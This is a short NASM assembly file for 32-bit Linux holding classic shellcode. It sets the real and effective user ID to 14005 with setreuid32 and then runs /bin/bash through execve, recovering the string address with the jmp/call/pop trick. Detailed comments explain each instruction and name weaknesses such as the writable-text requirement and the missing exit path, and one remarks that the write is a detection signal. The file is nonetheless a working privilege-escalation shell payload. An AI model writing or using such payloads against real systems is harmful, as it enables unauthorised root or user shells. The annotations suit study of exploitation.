; NASM syntax, 32-bit Linux (int 0x80 syscall ABI), no section directive so
; everything below, including the string, is assembled into the default .text.
; Layout is the classic jmp / call / pop pattern: `call exploit` pushes the
; address of the byte after it (the cmd string), which `pop edx` recovers.
; Register roles: eax = syscall number, ebx/ecx/edx = syscall args 1..3.
global _start

_start:
        jmp     short data              ; forward jump; the `call` at data: returns control to exploit:

exploit:
        xor     edx, edx
        xor     eax, eax                ; set reuid
        xor     ebx, ebx
        xor     ecx, ecx
        mov     al, 203                 ; syscall 203 = setreuid32 on i386 Linux
        mov     bx, 14005               ; ruid; 16-bit write into an already-zeroed ebx
        mov     cx, 14005               ; euid; same
        int     0x80                    ; return value in eax is not checked
        xor     eax, eax
        xor     ebx, ebx
        xor     ecx, ecx
        pop     edx                     ; edx = return address pushed by `call exploit` = address of cmd
        mov     [edx + 10], eax         ; stores 4 zero bytes at cmd+10, i.e. into the code section at runtime;
                                        ; requires a writable text mapping (W^X violation) and is a detection signal
        mov     al, 11                  ; syscall 11 = execve; at the syscall ebx = cmd, ecx = 0, edx still = address of cmd
        mov     ebx, cmd                ; 32-bit absolute address of the string (non-PIE link only)
        int     0x80                    ; does not return on success; on failure execution falls through into data: (no exit path)

data:
        call    exploit                 ; this puts the address of where we're at (where the string is!) in the stack and jmps to start

cmd:    db      '/bin/bash'             ; 9 bytes, no terminator emitted by the assembler